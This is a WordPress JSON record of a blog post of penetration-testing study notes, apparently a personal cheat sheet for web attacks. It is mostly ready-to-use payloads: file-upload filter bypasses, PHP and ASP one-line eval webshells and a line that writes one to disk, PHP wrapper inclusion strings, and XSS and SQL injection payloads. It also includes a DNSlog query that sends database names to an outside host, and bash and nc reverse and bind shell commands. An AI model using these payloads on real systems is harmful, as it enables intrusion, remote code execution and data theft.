{"id":23,"date":"2024-06-07T15:01:16","date_gmt":"2024-06-07T07:01:16","guid":{"rendered":"http:\/\/10.244.0.200:10524\/?p=9"},"modified":"2025-11-28T11:22:50","modified_gmt":"2025-11-28T03:22:50","slug":"yixiejiandandeshentouxuexibiji","status":"publish","type":"post","link":"https:\/\/www.nightying.com\/index.php\/2024\/06\/07\/yixiejiandandeshentouxuexibiji\/","title":{"rendered":"Some simple penetration-testing study notes"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\"><strong>File upload bypass:<\/strong><\/h2>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>.asp bypass:<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>aspx, ashx, ascx, cer, cdx, idc, ida, idq, inc, shtml, stm\n\n(IIS parsing vulnerability)\n\nInside a folder named XX.asp, IIS parses everything in the folder as ASP<\/strong><\/code><\/pre>\n\n\n\n<p>If the Access database is stored in .asp format, a one-line webshell can be inserted through data insertion, for example via a \u201cguestbook message\u201d<\/p>\n\n\n\n<p>Note: a # in a URL is treated as an anchor, so the \u201c#\u201d must be URL-encoded before the request is made<\/p>\n\n\n\n<p>The inserted one-line webshell needs to be transcoded; the following one is for insertion into a database<\/p>\n\n\n\n<p>\u253c\u6520\u6578\u7563\u6574\u7220\u7165\u6575\u7473\u2228\u2261\u2529\u613e password: a<\/p>\n\n\n\n<pre 
class=\"wp-block-code\"><code>To write the one-liner into a database, the database must be in .asp format, or we must be able to back it up in .asp format. Then connect to that .asp database with the client.\n\n \n\nWriting the one-liner into a file: we connect to that file. This case is hard to exploit. It generally requires that we know the target's source code and learn, by analysing it, that some feature writes to some file.<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>.jsp bypass:<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>jsp, jspx, java, class, jar, war<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>PHP bypass:<\/strong><\/h2>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>0e bypass:<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>a=QNKCDZO&amp;b=240610708<\/strong><\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>Array bypass:<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>?a&#91;]=1&amp;b&#91;]=2<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>In a strict comparison (===):\n&nbsp;the MD5 hash of the string ffifdyop is 276f722736c95d99e921722cf9ed621c\n&nbsp;which, converted to a string, is 'or'6 followed by garbled bytes\n&nbsp;\n&nbsp;Select * from 'admin' where password='or'6 (garbled bytes)\n&nbsp;This is equivalent to a universal password<\/strong><\/code><\/pre>\n\n\n\n<h4 
class=\"wp-block-heading\"><strong>PHP space bypass:<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>%20 %09\n\n$IFS$ {IFS}\n\n{cat,flag}<\/strong><\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>PHP blocklist bypass:<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>php4, phtml, phphpp, Php\n\nphp5 php3 php2\n\nphpt pht wphp\n\ninc\/.txt: save the PHP code in a .inc or .txt file and use .htaccess to set the MIME type of those files to application\/x-httpd-php, so that they pass as valid PHP files.<\/strong><\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>Case bypass:<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>Change the letter case (this is basically never encountered any more)<\/strong><\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Content-Type bypass:<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>1. Add special characters:\n\nContent-Type: image\/jpeg; php\n\n2. Change the file extension:\n\nRequires a file inclusion in order to execute\n\n3. Spoof the MIME type:\n\nChange the value of the Content-Type header to \"image\/jpeg\"\n\n4. Null-byte attack:\n\nContent-Type: image\/jpeg%00.php\n\n5. Content-Type injection:\n\nAppend ;Content-Type: image\/jpeg after the file name\n\n6. Content-Disposition bypass:\n\nForge Content-Disposition to make the server believe the uploaded file is of a legitimate type, bypassing blacklist validation.\n\nContent-Disposition: 
attachment; filename=\"malware.PDF\"<\/strong><\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>::$DATA bypass:<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>file name + ::$DATA<\/strong><\/code><\/pre>\n\n\n\n<p class=\"has-medium-font-size\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>HTML code for a file upload:<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>&lt;body&gt;\n\n    &lt;form action=\"upload endpoint URL\" method=\"post\" enctype=\"multipart\/form-data\"&gt;\n\n        &lt;input type=\"file\" name=\"file\" \/&gt;\n\n        &lt;input type=\"submit\" value=\"upload\" \/&gt;\n\n    &lt;\/form&gt;\n\n&lt;\/body&gt;<\/strong><\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\"><strong>File inclusion:<\/strong><\/h1>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Local file inclusion:<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>Find the path of the current directory through error messages or other means, then use ..\/ to traverse directories and read files. This can be combined with an upload endpoint to read a webshell<\/strong><\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Remote file inclusion:<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>Find the path of the current directory through error messages or other means; an http site can be included remotely, or a txt file can be uploaded and executed to write a shell:\n&lt;?php fputs(fopen('shell.php','w'),'&lt;?php @eval($_POST&#91;123])?&gt;'); 
?&gt;<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>XSS test strings<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>&lt;script&gt;alert(1)&lt;\/script&gt;\n\n'&gt;&lt;img src=\"#\" onerror=\"alert(1)\"\/&gt;\n\n' onclick=\"alert('xss')'&gt;\n\nPseudo-protocol, generally used in href:\n\nJavaScript:alert(\/xss\/)<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>XXE (XML external entity) injection vulnerability<\/strong><\/h2>\n\n\n\n<p>Principle: the server accepts and parses XML data from the client without strict security controls, which leads to XML external entity injection.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Definitions:<\/strong><\/h3>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>1. Document Type Definition (DTD), the layout language of XML\n\n2. Extensible Style Language (XSL), the stylesheet language of XML\n\n3. Extensible Link Language (XLL)\n\nXML: Extensible Markup Language, a subset of the Standard Generalized Markup Language, is a markup language used to mark up electronic documents so that they have structure. It is designed to transport data, not to display it. Its tags are not predefined; you define the tags yourself.<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>XML:<\/strong><\/h3>\n\n\n\n<figure 
class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" src=\"http:\/\/10.244.0.200:10524\/wp-content\/uploads\/2024\/06\/xml.png\" alt=\"\" class=\"wp-image-14\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" src=\"http:\/\/10.244.0.200:10524\/wp-content\/uploads\/2024\/06\/xml\u5b9e\u4f53.png\" alt=\"\" class=\"wp-image-15\"\/><\/figure>\n\n\n\n<p>An XML document consists of the XML declaration, the DTD (document type definition, optional), and the document elements<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" src=\"http:\/\/10.244.0.200:10524\/wp-content\/uploads\/2024\/06\/xml\u683c\u5f0f.png\" alt=\"\" class=\"wp-image-16\"\/><\/figure>\n\n\n\n<p>The DTD (document type definition) is used to define variables that act as shortcuts referring to ordinary text or special characters; it can be declared internally or referenced externally.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Internal DTD:<\/strong><\/h3>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" src=\"http:\/\/10.244.0.200:10524\/wp-content\/uploads\/2024\/06\/DTD\u5185\u90e8.png\" alt=\"\" class=\"wp-image-17\"\/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>External DTD:<\/strong><\/h3>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" src=\"http:\/\/10.244.0.200:10524\/wp-content\/uploads\/2024\/06\/DTD\u5916\u90e8.png\" alt=\"\" class=\"wp-image-18\"\/><\/figure>\n\n\n\n<p>DTD element declarations:<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>&lt;!ELEMENT element-name 
category&gt;\nCategory: EMPTY, (#PCDATA), (#CDATA), ANY\nPCDATA: text that is parsed by the parser. The parser checks this text for entities and markup.\nCDATA: text that is not parsed by the parser.\n&lt;!ELEMENT element-name (element-content)&gt;\nMultiple content items: (child-element-name 1,child-element-name 2,\u2026\u2026)\nOccurrence count of element content: by default, exactly once.\nAt least once: (child-element-name+)\nZero or more times: (child-element-name*)\nZero or one time: (child-element-name?)\nOr: (message|body)\nMixed category and element content:\n&lt;!ELEMENT note (#PCDATA|to|from|header|message)*&gt;<\/strong><\/code><\/pre>\n\n\n\n<p>DTD attribute declarations:<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>Basic format: &lt;!ATTLIST element-name attribute-name attribute-type default-value&gt;\n\nAttribute types:\nCDATA: the value is character data\n(en1|en2|\u2026): the value is one value from an enumerated list\nID: the value is a unique id\nIDREF: the value is the id of another element\nIDREFS: the value is a list of other ids\nNMTOKEN: the value is a valid XML name\nNMTOKENS: the value is a list of valid XML names\nENTITY: the value is an entity\nENTITIES: the value is a list of entities\nNOTATION: the value is the name of a notation\nxml: the value is a predefined XML 
value\nDefault value:\nvalue: the attribute's default value\n#REQUIRED: the attribute value is required\n#IMPLIED: the attribute is not required\n#FIXED value: the attribute value is fixed<\/strong><\/code><\/pre>\n\n\n\n<p>DTD entity declarations:<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>Named entity (internal entity): &lt;!ENTITY entity-name \"entity-value\"&gt;\nExternal entity: &lt;!ENTITY entity-name SYSTEM \"URI\/URL\"&gt;\nParameter entity: &lt;!ENTITY % entity-name \"entity-value\"&gt; (valid only inside the DTD)\nExternal parameter entity: &lt;!ENTITY % entity-name SYSTEM \"URI\"&gt; (valid only inside the DTD)<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>PHP deserialization:<\/strong><\/h2>\n\n\n\n<p>Serialization: converting an object into a string stream<\/p>\n\n\n\n<p>Deserialization: converting a string stream back into an object<\/p>\n\n\n\n<p>Deserialization vulnerability: user input is not filtered; there are two cases, without a class and with a class:<\/p>\n\n\n\n<p>Without a class: the deserialization process can be controlled to carry out operations such as SQL injection and directory traversal<\/p>\n\n\n\n<p>With a class: some magic methods of the object may be triggered<\/p>\n\n\n\n<pre class=\"wp-block-code 
has-small-font-size\"><code><strong>O:1:\"S\":1:{s:4:\"test\";s:29:\"&lt;script&gt;alert('xss')&lt;\/script&gt;\";}\n\nO: object\n1: length of the object name\n\"S\": object name\n1: number of variables in the object\ns: variable data type\n4: length of the variable name\n\"test\": variable name\ns: data type\n29: length of the variable value\n\"&lt;script&gt;alert('xss')&lt;\/script&gt;\": the variable value, which is also the injection point<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>Boolean (bool): b\nInteger (int): i\nString (str): s\nArray (array): a\nObject (object): O\nNULL: N<\/strong><\/code><\/pre>\n\n\n\n<p>Magic methods (triggers):<\/p>\n\n\n\n<p>(Prerequisite: an exploitable class exists)<\/p>\n\n\n\n<pre class=\"wp-block-code 
has-small-font-size\"><code><strong>__construct()\t\t\/\/ triggered when an object is created\n__destruct()\t\t\/\/ triggered when the object is destroyed\n__call()\t\/\/ triggered when an inaccessible method is called on an object\n__callStatic()\t\/\/ triggered when an inaccessible method is called in a static context\n__get()\t\t\/\/ used when reading data from an inaccessible property\n__set()\t\t\/\/ used when writing data to an inaccessible property\n__isset()\t\/\/ triggered when isset() or empty() is called on an inaccessible property\n__unset()\t\/\/ triggered when unset() is used on an inaccessible property\n__invoke()\t\/\/ triggered when a script tries to call the object as a function\n__wakeup()\t\/\/ called first when unserialize() runs\n__sleep()\t\/\/ called first when serialize() runs<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>PHP pseudo-protocols:<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">include() remote file inclusion:<\/h3>\n\n\n\n<p>Even if the file is not a PHP file, it is still parsed with PHP syntax<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>file:\/\/ protocol<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>1.file:\/\/&#91;absolute path and file name]\n\n2.&#91;relative path and file name]\n\n3.&#91;http:\/\/network path and file name]<\/strong><\/code><\/pre>\n\n\n\n<h4 
class=\"wp-block-heading\"><strong>php:\/\/ protocol<\/strong><\/h4>\n\n\n\n<p>php:\/\/input: execute PHP<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>php:\/\/input + &#91;POST DATA]\n&lt;?php system('ls')?&gt;<\/strong><\/code><\/pre>\n\n\n\n<p>php:\/\/filter: read source code<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>php:\/\/filter\/read=convert.base64-encode\/resource=&#91;file name]<\/strong><\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>zip:\/\/ bzip2:\/\/ zlib:\/\/ protocols<\/strong><\/h4>\n\n\n\n<p>1.zip:\/\/[absolute path of the archive]#[name of the file inside the archive]<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>Compress phpinfo.txt into phpinfo.zip, rename the archive to phpinfo.jpg, and upload it\nhttp:\/\/127.0.0.1\/include.php?file=zip:\/\/E:\\phpStudy\\PHPTutorial\\WWW\\phpinfo.jpg%23phpinfo.txt<\/strong><\/code><\/pre>\n\n\n\n<p>2.compress.bzip2:\/\/file.bz2<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>Compress phpinfo.txt into phpinfo.bz2 and upload it (any file extension is likewise supported)\nhttp:\/\/127.0.0.1\/include.php?file=compress.bzip2:\/\/E:\\phpStudy\\PHPTutorial\\WWW\\phpinfo.bz2<\/strong><\/code><\/pre>\n\n\n\n<p>3.compress.zlib:\/\/file.gz<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>Compress phpinfo.txt into phpinfo.gz and upload it (any file extension is likewise supported)\nhttp:\/\/127.0.0.1\/include.php?file=compress.zlib:\/\/E:\\phpStudy\\PHPTutorial\\WWW\\phpinfo.gz<\/strong><\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>data:\/\/ protocol<\/strong><\/h4>\n\n\n\n<p>1.data:\/\/text\/plain,<\/p>\n\n\n\n<pre class=\"wp-block-code 
has-small-font-size\"><code><strong>http:\/\/127.0.0.1\/include.php?file=data:\/\/text\/plain,&lt;?php%20phpinfo();?&gt;<\/strong><\/code><\/pre>\n\n\n\n<p>2.data:\/\/text\/plain;base64,<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>http:\/\/127.0.0.1\/include.php?file=data:\/\/text\/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Log injection:<\/strong><\/h2>\n\n\n\n<p>Log path: \/var\/log\/nginx\/access.log<\/p>\n\n\n\n<p>Inject a one-line webshell:<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>&lt;?php @eval($_POST&#91;'a']);?&gt;\n&lt;?php assert($_POST&#91;g]);?&gt;\nphpinfo();\nHowever, g=system('xxx'); does not execute (disable_functions is not set)<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>RCE commands:<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>| directly executes the statement that follows\n\nExample: ping 127.0.0.1|whoami\n\n|| if the preceding statement fails, the following statement is executed\n\nExample: ping 127.0.0.1||whoami\n\n&amp; the next statement runs after the previous one finishes, whether or not there was an error\n\nExample: ping 127.0.0.1&amp;whoami\n\n&amp;&amp; the next statement runs after the previous one finishes; if the previous command fails, the next command is not executed<\/strong><\/code><\/pre>\n\n\n\n<p>eval() command execution:<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>&lt;?php\nhighlight_file(__FILE__);       \n$arg = 
$_REQUEST&#91;'value'];\neval($arg);\n?&gt;<\/strong><\/code><\/pre>\n\n\n\n<p>Here, value is the input parameter<\/p>\n\n\n\n<p>PHP functions can be called, for example phpinfo();<\/p>\n\n\n\n<p>system(\"whoami\");<\/p>\n\n\n\n<p>The function call must end with a semicolon, otherwise an error is raised<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>Reverse shell, lookup and other commands:<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>NC reverse shell:\nnc -lvvp port  \nbash -i&gt;&amp; \/dev\/tcp\/ip\/port 0&gt;&amp;1 (can be bypassed with base64 encoding)\n\nBind shell:\nnc -lvvp port -e \/bin\/bash\n\nAttacker: nc ip port\n\ncurl, whois, python, php, ruby, socat\n\n\n\nfind: -name searches by exact file name, * for loose matching, ? for any single character\n\n-atime +days   -amin +minutes -mtime modification time<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>SQL section:<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>Numeric:\n\n?id=1 or 1=1#<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>String:\n\n?name=ab' or 1=1#<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>Search type: '%keyword%'\n\n?name=abc%' or 1=1#<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>xx type:\n\n?name=123') and 1=1#\n\ninsert\/update type: (mind the form field length)\n\nusename=123','456','789',SQL statement)#<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code 
has-small-font-size\"><code><strong>Boolean-based blind injection:\n\n?id=1' and (length(database()))&gt;7#\n\n?id=1' and ascii(substr(database(),1,1))&gt;100#\n\nIn substr((),1,1) the first 1 means start from the first character, and the second 1 is the length to take<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>Time-based blind injection:\n\n?name=abc' and sleep(5)#<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>Wide-byte blind injection:\n\n?name=abc %df' and 1=1#\n\n(for injection with echoed output, mind the length; sometimes it can only be done in Burp)<\/strong><\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>DNSlog injection:<\/strong><\/h3>\n\n\n\n<p>Using the load_file function:<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>and (select load_file(concat('\/\/',(select database()),'.6.eudspa.dnslog.cn\/a')))--+\n\nand (select load_file(concat('\\\\\\\\',(select database()),'.d7d27f.dnslog.cn\\\\xxx.txt')))<\/strong><\/code><\/pre>\n\n\n\n<p><strong>Requirements for the function:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>load_file()\nread\/write privileges\nWindows (UNC path)\n\nand (select count(*) from mysql.user)&gt;0 \/*if the result returns normally, the account has read\/write privileges.*\/\nand (select count(*) from mysql.user)&gt;0 \/*if an error is returned, the administrator has probably reduced the database account's privileges*\/<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>SQLmap:<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>-u \"URL\"\n\n-l 
filename.txt\n\n--dbs databases -D database name\n\n--tables tables -T table name\n\n--columns columns -C column name\n\n--dump fetch and output the column contents\n\n--batch automation option, used to run all operations with the defaults<\/strong><\/code><\/pre>\n\n\n\n<p><strong>Manual injection (HackBar):<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>Get all databases\n\nunion select 1,group_concat(schema_name),3 from information_schema.schemata\n\nGet all tables\n\nunion select group_concat(table_name) from information_schema.tables where table_schema=database()\t\tAND table_name=\"table name\"\n\nGet all columns\n\nunion select group_concat(column_name) from information_schema.columns where table_schema=database()\t\n\nGet the column contents of a given table in a given database\n\nunion select 1,group_concat(target_column),3 from target_database.target_table\n\nsqlmap space bypass:\n\npython sqlmap.py --random-agent -l zzz.txt --tamper space2comment -D database_name -T table_name --dump\n\nMySQL space bypass:\n\n%20 %09 %0a %0b %0c %0d %a0 %00\n\n\/**\/\t\t()<\/strong><\/code><\/pre>\n\n\n\n<p><strong>Comma bypass:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>union select 1,2,3;\n\nunion select * from ((select 1)A join (select 2)B join (select 3)C);<\/strong><\/code><\/pre>\n\n\n\n<p><strong>union select bypass:<\/strong><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">One-line webshells (usually used with Behinder or AntSword):<\/h2>\n\n\n\n<p><strong>asp:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u253c\u6520\u6578\u7563\u6574\u7220\u7165\u6575\u7473\u2228\u2261\u2529\u613e \t\t\tpassword: a<\/strong>\n\n&lt;%%25Execute(request(\"a\"))%%25> 
\n&lt;%Execute(request(\"a\"))%> \n%>&lt;%execute request(\"a\")%>&lt;%  \n&lt;script language=VBScript runat=server>execute request(\"a\")&lt;\/script> \n&lt;%25Execute(request(\"a\"))%25> \n%>&lt;%execute request(\"yy\")%> \n&lt;%execute request(char(97))%> \n&lt;%eval request(char(97))%> \n\":execute request(\"value\"):a=\"  \n&lt;script language=VBScript runat=server>if request(chr(35))&lt;>\"\"\"\" then  \nExecuteGlobal request(chr(35)) &lt;\/script> \n\nOne-line webshell for insertion into a database  \n\u253c\u6520\u6578\u7563\u6574\u7220\u7165\u6575\u7473\u2228\u2223\u2529\u613e  password: a  \nEncoding method: ANSI->Unicode<\/code><\/pre>\n\n\n\n<p><strong>php:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>&lt;?php @eval($_POST&#91;'a']);?&gt;\n&lt;?php assert($_POST&#91;g]);?&gt;<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>File upload bypass: .asp bypass: If the Access database is stored in .asp format, a one-line webshell can be inserted through data insertion, for example 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23","post","type-post","status-publish","format-standard","hentry","category-shentouceshi"],"_links":{"self":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts\/23","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/comments?post=23"}],"version-history":[{"count":10,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts\/23\/revisions"}],"predecessor-version":[{"id":1743,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts\/23\/revisions\/1743"}],"wp:attachment":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/media?parent=23"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/categories?post=23"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/tags?post=23"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}